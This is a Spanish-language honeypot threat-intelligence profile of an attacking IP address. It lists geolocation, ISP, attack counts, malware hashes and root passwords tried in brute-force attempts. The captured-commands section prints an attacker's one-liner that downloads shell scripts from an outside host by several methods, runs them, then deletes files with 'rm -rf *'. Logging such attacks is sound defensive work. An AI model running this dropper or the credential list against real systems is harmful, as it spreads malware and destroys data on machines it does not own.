Amenaza Activa • MEDIO

45.156.87.204

Pais de Origen🇳🇱 Paises Bajos

Primera Deteccion8/1/2026

Ultima Actividad12/1/2026

ISPPfcloud UG (haftungsbeschrankt)

🎯

336

Ataques Totales

🔌

Puertos

📡

Tipos Ataque

🦠

Malware

Geolocalizacion

Pais: 🇳🇱 Paises Bajos
Ciudad: Eygelshoven
ASN: AS51396
ISP: Pfcloud UG (haftungsbeschrankt)

Tipos de Ataque

cowrie

Puertos Atacados

Malware Asociado

4055f310003ab83c343e...→3b6409aecd4af0f82f5a...→8737483f9dc335904b0d...→

Credenciales Intentadas

🔐root/root

🔐root/admin

🔐root/admin12345

🔐root/root123

🔐root/YYY@123

🔐root/JJJ@123

🔐root/kshkshsk

🔐root/CC@123

🔐root/Qwerty111

🔐root/OO@123

🔐root/UUU@123

🔐root/BB@123

🔐root/VV@123

🔐root/TT@123

🔐root/RRR@123

Comandos Ejecutados

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://202.1.31.174/1.sh; curl -O http://202.1.31.174/1.sh; chmod 777 1.sh; sh 1.sh; tftp 202.1.31.174 -c get 1.sh; chmod 777 1.sh; sh 1.sh; tftp -r 3.sh -g 202.1.31.174; chmod 777 3.sh; sh 3.sh; ftpget -v -u anonymous -p anonymous -P 21 202.1.31.174 2.sh 2.sh; sh 2.sh; rm -rf 1.sh 1.sh 3.sh 2.sh; rm -rf *

$history | tail -51x

$ssh -V1x

Evaluacion de Riesgo

/100

BajoMedioAltoCritico